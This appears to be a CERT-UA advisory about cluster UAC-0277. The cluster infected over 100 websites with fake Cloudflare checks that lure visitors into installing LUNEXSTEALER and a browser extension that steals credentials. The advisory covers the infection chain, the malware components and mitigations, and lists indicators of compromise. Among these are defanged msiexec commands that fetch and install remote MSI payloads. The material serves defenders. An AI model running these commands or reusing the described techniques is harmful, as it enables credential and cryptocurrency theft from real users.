UAC-0277: ClickFix on compromised websites to spread LUNEXSTEALER
5.10.26
General information
In September 2026, CERT-UA specialists discovered over 100 compromised websites to which malicious JavaScript code had been added by attackers. When visiting such a site, the user was shown a fake Cloudflare verification page, which, under the pretext of confirming that the visitor was a human, offered to execute a command. Executing the command resulted in downloading and installing an MSI package from a remote server (ClickFix technique).
The domain name of the resource from which the fake verification page is loaded and the script's operating mode are stored in a smart contract on the Polygon or Ethereum network and are read by the script during each execution. This allows attackers to quickly and centrally change the domain and operating mode without having to re-access the compromised websites. There are three operating modes: 0 - inactive; 1 - passive tracking of visitors (data about the website and the page from which it was accessed are transmitted to the attackers' server); 2 - display of a fake verification page.
In mode 2, the fake verification page was displayed only to Windows users who visited the site via a link from search engines (Google, DuckDuckGo, meta.ua, bigmir.net, etc.), and no more than twice in 12 hours.
Various MSI packages were distributed as part of the campaign. CERT-UA specialists received and investigated three of their variants.
The first option installs the LUNEXSTEALER malware on the system.
The second variant contains a bootloader that attempts to bypass Windows User Account Control (UAC) and adds exceptions to Microsoft Defender. To counter the protections, it deploys a vulnerable AMD PDFWKRNL.sys driver and exploits the CVE-2023-20598 vulnerability (BYOVD technique). The bootloader then retrieves and runs the LUNEXSTEALER malware from a remote server.
The third option to launch the same LUNEXSTEALER uses the DLL side-loading technique: the legitimate FnHotkeyUtility.exe file loads the malicious spkvol.dll library, which decrypts and launches LUNEXSTEALER.
Depending on the configuration received from the control server, LUNEXSTEALER can install a malicious browser extension called LUNARAXE, which appears in the browser under the name "Microsoft Office Word Editor". The extension steals cookies, browsing history, and credentials entered into web forms, and also allows attackers to remotely control the browser: execute JavaScript code on web pages, manage tabs and take snapshots of them, and change proxy server settings. If the NAIVEMESS auxiliary component is present, the extension also gains access to the computer's file system.
To track the described activity, a cyber threat cluster identifier UAC-0277 has been created.
Please note that no legitimate "I'm not a robot" verification process requires you to press Win+R, open a command prompt or PowerShell, or paste and execute any commands. If you receive such a request on a website, close the page, even if the site is familiar to you.
System administrators are advised to:
prohibit the use of the "Run" window (Win+R) by regular users using group policies;
restrict installation of MSI packages to users without administrator rights and monitor the launch of msiexec.exe with a URL in the command line;
enable blocking of vulnerable drivers (Microsoft Vulnerable Driver Blocklist);
limit the installation of browser extensions to a list of allowed ones.
If you discover a website with a fake verification page, please report it to CERT-UA.
If you are the owner or administrator of a compromised website, contact us for practical and advisory assistance in determining the method of compromise.
LUNEXSTEALER is a 64-bit Windows malware that combines the functions of an infostealer and a remote execution agent. The program steals passwords and tokens stored in browsers, desktop and browser cryptocurrency wallets, and system information. It also allows you to download and run executables, MSI packages, PowerShell scripts, and cmd.exe commands. LUNEXSTEALER contains a nested malicious extension LUNARAXE and NAIVEMESS deployment components that are installed based on the configuration received from the management server. A scheduled task “psychedelicloveUtils” can be created for pinning based on the same configuration. The HTTP protocol is used to interact with the management server.
LUNARAXE is a multi-component malicious extension for Chromium-based browsers designed to steal browser data and remotely control the browser. The extension consists of the main component LUNARAXE.CORE, which interacts with the control server, and auxiliary components LUNARAXE.STEALER and LUNARAXE.STRIP. To access the file system, the extension uses a separate component NAIVEMESS.
LUNARAXE.CORE is the main component of the LUNARAXE extension, which provides interaction with the management server, collection of browser data and execution of commands. The component runs in the background and transmits cookies, browsing history, bookmarks, information about installed extensions, as well as credentials intercepted by LUNARAXE.STEALER to the management server. The functionality of the component includes managing tabs and taking snapshots of them, changing proxy settings, enabling and disabling extensions, displaying notifications, executing JavaScript code on web pages, and overlaying a full-screen iframe over their content. If NAIVEMESS is available on the host system, the component also allows you to copy files from the computer, write files to it, and run them. HTTP and WebSocket protocols are used to interact with the management server; the component automatically resumes operation after the browser is restarted.
LUNARAXE.STEALER is a component of the LUNARAXE extension designed to intercept credentials entered into web forms. The component runs on web pages and reads the values of the login and password fields when the form is submitted or the submit button is pressed. The received data, together with the page address, is transmitted to the LUNARAXE.CORE component via the extension's internal messaging mechanism. The component does not have its own communication channel with the management server.
LUNARAXE.STRIP is a support component of the LUNARAXE extension designed to disable the Content Security Policy (CSP) protection mechanism on web pages. CSP limits the sources from which a page can download scripts and the addresses to which it can transfer data. The component removes CSP headers from HTTP responses using the browser's network request modification rules, and also removes the corresponding HTML meta tags from pages and monitors their re-addition. Presumably, this allows other LUNARAXE components to execute their own JavaScript code and transfer data even on websites with strict security policies. The component does not have its own communication channel with the management server.
NAIVEMESS is a PowerShell-based auxiliary component that provides a malicious browser extension with access to the Windows file system. The component is registered in the system as a Native Messaging host "com.lunex.explorer" - a legitimate mechanism that allows browser extensions to exchange data with programs on the computer. The functionality of NAIVEMESS includes obtaining a list of disks, browsing directories, reading, creating and overwriting files, as well as launching them. Files are transferred in parts in Base64 encoding, and directories and groups of files are pre-archived in ZIP. The component does not have its own communication channel with the management server: commands are received through the extension.
Graphic images:
Fig. 1 Example of a malicious script on a compromised website
Fig. 2 Example of a malicious script on a compromised website
Fig. 3 Example of a fake Cloudflare verification page
Fig. 4 Example of the malicious LUNARAXE extension installed in the Google Chrome browser
Cyber threat indicators
Files:
1f250eb486571d99bc1e4d760e37a554 38e90affe37342ee36917cdc535fe9bf04589afa8430eb8d1ba1016adcfc1878 elita.msi 348cabe85c8bb40e690ab873ab94acac bf14cd6c3328ebd08e940478b5d1da04e9e5aa576d045d41950bf4f1e2456dd8 psychedelic.exe b96d75a000367c200958089728fc5cb8 6e8b49cf70bf854e8c59c7d27cefa89406caf8978461190dabb86dafcd8554e1 embedded_driver.sys 670086be6d64b3fc9d9edcbaf8986c02 3b039a36ed576353cb7eb1054b6ac56f42f63a6fc447edeb58c48b4bb7537482 elit.msi dac640a37d5096c47fdd8f745b9a9115 2a373c2ace484d2ada44a26b356de18b5ec8e9d57c5060d42ff239ec1705059c Progressive.exe d8a99b7a81cfdacc8734e098efe8076e ad858ea577379fe1ab9e566b2108302185527c66eb9cbd7d0e381297316e8881 spkvol.dll ae5450f32bcb533c5b592c77a7861553 06f434695f93d7fd11eeff71358ff69fed79d310a66d993bbcc4ff979c117c90 psychedeliclove.exe 081eba2bfe3bfb56d6c5ad7d1b28fd6c cbe90746b6c6f0e4c0e80d4748a149f85341f8405b9e524f8abcf0723a97438b elite.msi f45a2b3995b2da034b2e03b7ed6cdaaa f145d4f731d4140de183473b5c6a500a31f44173153fd323cadafa334ee83a3d elite.exe 86f5a4f1e83e8b9db390736539863e91 eed67d92d1f059e5b848114c0846207db357d1d60b494b88b8f0e3d9ba5cf24a think.msi cb18caf0dd576a356bb0627989f85b8c c2198398e84684d7b48d92261996116d2d98c7d4ffbff2b8cc955d1ff06e77eb fresh-thinking_12.9.84.30_INSTALL.exe b7081d752375ad8b06639cc9506a4e8e f16ed095c92c5f65ddb43bf4a6352da1deaead4e98d7187c4fc44d17dfbe88ad spkvol.dll 19911b5ad1a5952bf17ecff467b45c62 0eb2c2ac3c593bbeef72dff02a38cdba18589b1dc65f3fd730ed33e9e99cb8b7 background.ts-Dgde4GDq.js 9a5d0e4382efec512737fdecb8a71dd8 274dc91b92bf17a05ff4f3bfae04924167e4d53f276e7b6c0d6026b3304827b0 content.ts-B6XGI__y.js eac6683cb79f2e3bd570ee9edd077f3b 6b6a30712d566d30a20c6232d2fe9bc1c49170d78d1ab548513ab46f86bf3c06 service-worker-loader.js e5a52ed35bece9bf020b891e47317787 1eb51ef2544ce57dfdfafd3b1400e43abb244887b14c82d0c5a984af70152838 manifest.json e69a8798fe7d92cee5f7b5321866f01e 725c1cb7ca5f669574988069a3cdb617cba891d4a4a03aa9a1fd3f95c6035997 csp-strip.ts-DrI45pKU.js 0b05147f194274070073c8768684cea5 4efef6a50ae74ea49283a7aec1ee2014ce15a17c05ac0c8df082a6f1449781fa esptnk.msi 3408ae0d10986ea2c50dca523667ac47 4cd6b9a5841aabb060f10d4d029d1c10a69ad6d2d9291243c504977cf715fefb solution_6.81.6017.2_INSTALL.exe b705a55c963c4c624bfd5d67c6c25fbb c4e6cfad25e0a93b8542c6280d6c5e0b9de2cfe18c9a67f2d6e4570ae2b92fef spkvol.dll ccaa01de34fad977420179382f37bc3e 289e408e1d2661f55e59611535a156914cd7c60f69f6e3de1163c01c56e487d2 background.ts-L_QBuUJg.js f145ec4608878fcbe5b4c94e510b453c 09f83b5f79b934e12f8077b2b462d938ea8124e15ea0debeefe22b706d6c1e92 content.ts-B6XGI__y.js d8ac71c0593997a5d95276bf705ec7e3 299617dd8b220a49dfaa0cbd0c997e9ba8b01d4cfb0f7aada5db923403dc0587 service-worker-loader.js e3ccdf43a405127c7f1eadce436fccd7 3c9bef5c766c8c0bcc403248a489e656f4e31bea0083575dc815afe68f6abe26 manifest.json 502eb1fb70c0153f0d56f12d49a20094 957776ef93ff598bfbe9dfba8c80425c1718927605c42e26131b0362dd790343 csp-strip.ts-DrI45pKU.js 2b19559333c0a5047892cf7239b9057d fd80d52c7aa4f82744fb6a82c878851a6dd50e001bfbb2b7dd9df884dbcdfb40 omen.msi 9fb1c651405f35c859fc89ff4c142a49 b862fa82eacf4b989c6a82155c1f4ab0b435f57b4d20a0bf2871fc675fca6059 omen.exe 51ccf7074c6d4753e4a1d335184c39d4 c67c0800d9cff00b0b377e205e03ff4dcb5a6587cceacb4e7b08e29c51aeee9f spkvol.dll
Network:
107[.]175.82.242 193[.]178.158.61 193[.]178.159.128 109[.]238.86.112 109[.]238.86.113 176[.]53.159.40 159 . chillplace.pp[.]ua alohapages.pp[.]ua vatra.pp[.]ua fainomedia.pp[.]ua trembita.pp[.]ua archivision.pp[.]ua (ws)://193[.]178.159.128:8080/api/v1/ext/remote hXXp://107[.]175.82.242:9000/wilow/psychedeliclove[.]exe hXXp://193[.]178.159.128:8080 hXXps://uasputnik[.]com/elit.msi hXXps://uasputnik[.]com/elita.msi hXXps://uasputnik[.]com/elite.msi hXXp://109[.]238.86.112:8080 hXXp://109[.]238.86.113:8080 hXXps://ahahahahadebili[.]help/tds/tds.php hXXps://ahahahahadebili[.]help/think.msi hXXps://sputnk[.]com/think.msi hXXps://uasputn[.]com/esptnk.msi hXXps://uasputnik[.]com/omen.msi hXXps://ukrainerada[.]top/tds/tds.php hXXps://chillplace.pp[.]ua/tds/tds.php hXXps://alohapages.pp[.]ua/tds/tds.php hXXps://spectre.pp[.]ua/tds/tds.php hXXps://spectre.pp[.]ua/spectre.msi https[:]//ilovecutecatetetes[.]click https[:]//ilovecutecatics[.]com http[:]//ilovecutecatics[.]com[:]8080 https[:]//ilovecutecatics[.]com[:]2053 https[:]//ilovecutecaticval[.]com[:]2053
Host:
%PROGRAMDATA%/SalmonLightSlateGray/FnHotkeyUtility.exe %PROGRAMDATA%/SalmonLightSlateGray/spkvol.dll %PROGRAMDATA%\SlateGrayChocolate\spkvol.dll %PROGRAMDATA%\GrayLightCyan\FnHotkeyUtility.exe %PROGRAMDATA%\GrayLightCyan\spkvol.dll %TEMP%\psychedeliclove.exe Local\psychedeliclove-guard msiexec.exe /i "hXXps://uasputnik[.]com/elit.msi" /passive ORG_NOTE=”Protection from automated requests… ✔️ I confirm that I am not a robot.” msiexec.exe /i "hXXps://uasputnik[.]com/elita.msi" /passive ORG_NOTE=”Protection from automated requests… ✔️ I confirm that I am not a robot.” msiexec.exe /i "hXXps://uasputnik[.]com/elite.msi" /passive ORG_NOTE=”Protection from automated requests… ✔️ I confirm that I am not a robot.” psychedelicloveUtils (Scheduled Task)